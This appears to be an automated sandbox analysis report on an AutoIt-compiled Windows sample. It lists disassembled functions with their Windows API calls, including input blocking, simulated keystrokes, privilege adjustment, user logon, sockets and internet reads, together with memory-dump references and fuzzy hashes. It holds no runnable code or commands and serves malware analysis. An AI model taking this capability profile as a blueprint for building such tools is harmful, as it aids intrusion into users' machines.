                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1300846289-0
                                                                                                                        • Opcode ID: a48ddb4307db07a9ac5b7cacce91470daa7fab21cc96a3db02cb0a11e6fc4945
                                                                                                                        • Instruction ID: 261ee13b24d54d55505bde754ec05f44ad30a1fedfc70104ca403ccdf06919f0
                                                                                                                        • Opcode Fuzzy Hash: a48ddb4307db07a9ac5b7cacce91470daa7fab21cc96a3db02cb0a11e6fc4945
                                                                                                                        • Instruction Fuzzy Hash: AB028E70A00209DFCF04DF64D982AAEBBF5EF48340F54D469E80AEB255EB319A55CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00EAACF5
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00EA973D
                                                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00EA9760
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4170576061-0
                                                                                                                        • Opcode ID: e58eaf501f6c1a819dc94400926430f22eb8ec68de59d5cb2b85029dd461b8dd
                                                                                                                        • Instruction ID: 934839eab556e438d826358398c1a3d8e2453ce0ffd59c8fb0357d512c3e11d5
                                                                                                                        • Opcode Fuzzy Hash: e58eaf501f6c1a819dc94400926430f22eb8ec68de59d5cb2b85029dd461b8dd
                                                                                                                        • Instruction Fuzzy Hash: 8141D370600210AFDB10AF64DC82E6E77EDEF48364F14945EF956BB392CB74AD018B91
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E9F37A
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9F3AA
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9F3BF
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E9F3D0
                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E9F3FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2387731787-0
                                                                                                                        • Opcode ID: 3bc109dc33eb2e4e3c8f11b0a981f7cfb38d3480ab77684372f27207e82850c0
                                                                                                                        • Instruction ID: e64ec7840e08b750eb0db0b020a4845ad3ca5533aa682dfdd321d7d82327c11d
                                                                                                                        • Opcode Fuzzy Hash: 3bc109dc33eb2e4e3c8f11b0a981f7cfb38d3480ab77684372f27207e82850c0
                                                                                                                        • Instruction Fuzzy Hash: 6841D2356047019FCB04DF28D490A9AB7E4FF49324F10452EE96AEB3A1DB31ED45CB91
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EB20EC,?,00EB22E0), ref: 00EB2104
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00EB2116
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                        • Opcode ID: e8280dc543d8da57dd47bcf75f720632224ed9b62298b0f0e64aacd2facbe2bf
                                                                                                                        • Instruction ID: 8e79d0e2761ab4b6f71d5ef471fda417c1959408941f8d025a05cd4f6521f831
                                                                                                                        • Opcode Fuzzy Hash: e8280dc543d8da57dd47bcf75f720632224ed9b62298b0f0e64aacd2facbe2bf
                                                                                                                        • Instruction Fuzzy Hash: 75D05E744463128FD7205B65EC0D64237D8EF04305F10542EE799A2194D670CC80AA10
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • _memmove.LIBCMT ref: 00E62C63
                                                                                                                        • _memmove.LIBCMT ref: 00E6303A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1300846289-2766056989
                                                                                                                        • Opcode ID: c21a77f1c767915429e432d4819e77e4b4751f7b2bf7b302974830a24de0bd6c
                                                                                                                        • Instruction ID: aed138806d5ad939bf49ba5b005915be1a1200131eb87ba2ef378efdb63f7cc9
                                                                                                                        • Opcode Fuzzy Hash: c21a77f1c767915429e432d4819e77e4b4751f7b2bf7b302974830a24de0bd6c
                                                                                                                        • Instruction Fuzzy Hash: ECC29A74A00209DFCB14DFA8D990AADB7B1FF48344F24A05DE916BB351DB35AE46CB90
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: ,d
                                                                                                                        • API String ID: 4104443479-40157079
                                                                                                                        • Opcode ID: c7a7084d638b30bb21afe376a540af7cce0674e5263fb006ffccfb3084a82abc
                                                                                                                        • Instruction ID: dd16f302eae27ad85e66251ed8efae1ac281c2a0aba40c3d58199651184f6c13
                                                                                                                        • Opcode Fuzzy Hash: c7a7084d638b30bb21afe376a540af7cce0674e5263fb006ffccfb3084a82abc
                                                                                                                        • Instruction Fuzzy Hash: EAA28A74E00219CFCB28CF58C4806ADBBB1FF58315F6595AAE859BB390D7309E86DB40
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E9439C
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E943B8
                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00E94425
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00E94483
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E9221E
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($|
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E6AE5E
                                                                                                                        Similarity
                                                                                                                        • API ID: LongProcWindow
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EA4A1E,00000000), ref: 00EA55FD
                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EA5629
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9EA95
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E9EAEF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E9EB3C
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8BF0F
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E8BF3C
                                                                                                                        • GetLastError.KERNEL32 ref: 00E8BF49
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E970D8
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00E97115
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E9711E
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E8BE5A
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E8BE71
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00E8BE81
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(00E5C848,00E5C848), ref: 00E6DDA2
                                                                                                                        • FindFirstFileW.KERNEL32(00E5C848,?), ref: 00EC4A83
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4185537391-0
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E9FD71
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E9FDA1
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EAC2E2,?,?,00000000,?), ref: 00E9D73F
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EAC2E2,?,?,00000000,?), ref: 00E9D751
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E94B89
                                                                                                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00E94B9C
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536248340-0
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E8B9EC), ref: 00E8B8C5
                                                                                                                        • CloseHandle.KERNEL32(?,?,00E8B9EC), ref: 00E8B8D7
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00E5125D,00E77A43,00E50F35,?,?,00000001), ref: 00E78E41
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E78E4A
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3964851224-0
                                                                                                                        APIs
                                                                                                                        • __time64.LIBCMT ref: 00E9BFCB
                                                                                                                          • Part of subcall function 00E740DA: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E9C6AF,00000000,?,?,?,?,00E9C85C,00000000,?), ref: 00E740E3
                                                                                                                          • Part of subcall function 00E740DA: __aulldiv.LIBCMT ref: 00E74103
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2893107130-0
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 00EA7057
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        APIs
                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00E97DF8
                                                                                                                        Similarity
                                                                                                                        • API ID: mouse_event
                                                                                                                        APIs
                                                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E8BA6A), ref: 00E8BEB3
                                                                                                                        Similarity
                                                                                                                        • API ID: LogonUser
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E78E1F
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00E76AE9,00F067D8,00000014), ref: 00E7A937
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: ee369c5ea00180837eb1810ffae8e90f768fb95b94c9bad379ae954adaa85ef0
                                                                                                                        • Instruction ID: d7289c885d97d2d6959806442ff17f8c9bd385f3aff81cd3e4bd09a026cf3e8a
                                                                                                                        • Opcode Fuzzy Hash: ee369c5ea00180837eb1810ffae8e90f768fb95b94c9bad379ae954adaa85ef0
                                                                                                                        • Instruction Fuzzy Hash: 03B012B43031024FD7084B39BC6415A3AD4D749101342803E7003C6661DF308450EF00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                        • Instruction ID: afbc48bb01d9ff57bd5817de47394a4f8438014de62b0bc39d411d89918bf3d7
                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                        • Instruction Fuzzy Hash: EDC1E6722052D389DF2EC63DC43043EFAA15AA27B931AA79DD4BBDF4D0EE24C564D610
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                        • Instruction ID: 97873a1bdb28c81fa3d5aa91743411406eba848387ce9bc44f27b604a14231e3
                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                        • Instruction Fuzzy Hash: 12C11A7220529349DF2EC63DC43043EFAA15AA27B931A63ADD4B7DF4C4FE24C564D520
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                        • Instruction ID: 060535f26da09170d2d418563879f492315b74cdc3169594aecf9b3a604ce071
                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                        • Instruction Fuzzy Hash: CBC1E972205293CADF2EC639C43443EFBA15AA17B931AA76DD4BBEB0C4EE14C564D610
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAA7A5
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAA7B7
                                                                                                                        • DestroyWindow.USER32 ref: 00EAA7C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EAA7DF
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EAA7E6
                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00EAA927
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00EAA937
                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAA97F
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00EAA98B
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EAA9C5
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAA9E7
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAA9FA
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA05
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EAAA0E
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA1D
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EAAA26
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA2D
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAAA38
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA4A
                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00EDD9BC,00000000), ref: 00EAAA60
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAAA70
                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00EAAA96
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00EAAAB5
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAAD7
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAACC4
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EBD0EB
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EBD11C
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00EBD128
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00EBD142
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EBD151
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EBD17C
                                                                                                                        • GetSysColor.USER32(00000010), ref: 00EBD184
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00EBD18B
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00EBD19A
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EBD1A1
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00EBD1EC
                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00EBD21E
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBD249
                                                                                                                          • Part of subcall function 00EBD385: GetSysColor.USER32(00000012), ref: 00EBD3BE
                                                                                                                          • Part of subcall function 00EBD385: SetTextColor.GDI32(?,?), ref: 00EBD3C2
                                                                                                                          • Part of subcall function 00EBD385: GetSysColorBrush.USER32(0000000F), ref: 00EBD3D8
                                                                                                                          • Part of subcall function 00EBD385: GetSysColor.USER32(0000000F), ref: 00EBD3E3
